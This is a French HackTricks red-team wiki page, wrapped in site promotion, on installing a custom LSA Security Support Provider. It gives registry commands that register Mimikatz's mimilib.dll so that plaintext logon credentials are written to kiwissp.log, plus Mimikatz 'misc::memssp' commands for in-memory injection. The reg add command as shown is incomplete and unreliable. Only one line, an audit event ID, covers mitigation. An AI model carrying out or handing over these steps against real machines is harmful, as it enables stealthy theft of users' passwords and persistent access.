Custom SSP
Reading time: 2 minutes
tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs au HackTricks et HackTricks Cloud dépôts github.
Custom SSP
Apprenez ce qu'est un SSP (Security Support Provider) ici.
Vous pouvez créer votre propre SSP pour capturer en texte clair les identifiants utilisés pour accéder à la machine.
Mimilib
Vous pouvez utiliser le binaire mimilib.dll
fourni par Mimikatz. Cela enregistrera dans un fichier tous les identifiants en texte clair.
Déposez le dll dans C:\Windows\System32\
Obtenez une liste des packages de sécurité LSA existants :
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
Ajoutez mimilib.dll
à la liste des fournisseurs de support de sécurité (Security Packages) :
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
Et après un redémarrage, toutes les informations d'identification peuvent être trouvées en texte clair dans C:\Windows\System32\kiwissp.log
En mémoire
Vous pouvez également injecter cela en mémoire directement en utilisant Mimikatz (notez que cela pourrait être un peu instable/ne pas fonctionner) :
privilege::debug
misc::memssp
Cela ne survivra pas aux redémarrages.
Atténuation
ID d'événement 4657 - Audit de la création/changement de HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs au HackTricks et HackTricks Cloud dépôts github.